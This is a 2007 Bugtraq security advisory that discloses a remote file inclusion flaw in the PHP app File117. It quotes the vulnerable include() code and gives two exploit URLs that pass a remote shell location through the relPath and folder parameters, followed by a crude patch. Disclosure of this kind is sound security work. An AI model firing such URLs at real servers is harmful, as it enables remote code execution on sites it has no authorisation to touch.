[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070422185014.2555.qmail@securityfocus.com>
Date: 22 Apr 2007 18:50:14 -0000
From: InyeXion@...il.com
To: bugtraq@...urityfocus.com
Subject: File117 Remote File Inclusion
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
File117 Remote File Inclusion
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Affected Software .: File117
Download..: http://www.sinato.com/jmuffin/upload/file117.zip
Risk ..............: high
Found by ..........: InyeXion
Contact ...........: InyeXion[at]gmail.com
Web .............: Www.InyeXion.com.ar
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Affected File:
/html/php/detail.php
Vulnerable Code:
<?php
include_once("phpInterface.php");
$$cmname=$cm;
include($relPath.$folder."/".$templatename);
?>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit:
http://[target]/html/php/detail.php?relPath=[shell]?
http://[target]/html/php/detail.php?folder=[shell]?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Fixed bug:
if((isset($_REQUEST['relPath']) || isset($_GET['relPath']) || isset($_POST['relPath'])) && !defined("relPath")){
die("denied access"); }
AND
if((isset($_REQUEST['folder']) || isset($_GET['folder']) || isset($_POST['folder'])) && !defined("folder")){
die("denied access"); }
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Powered by blists - more mailing lists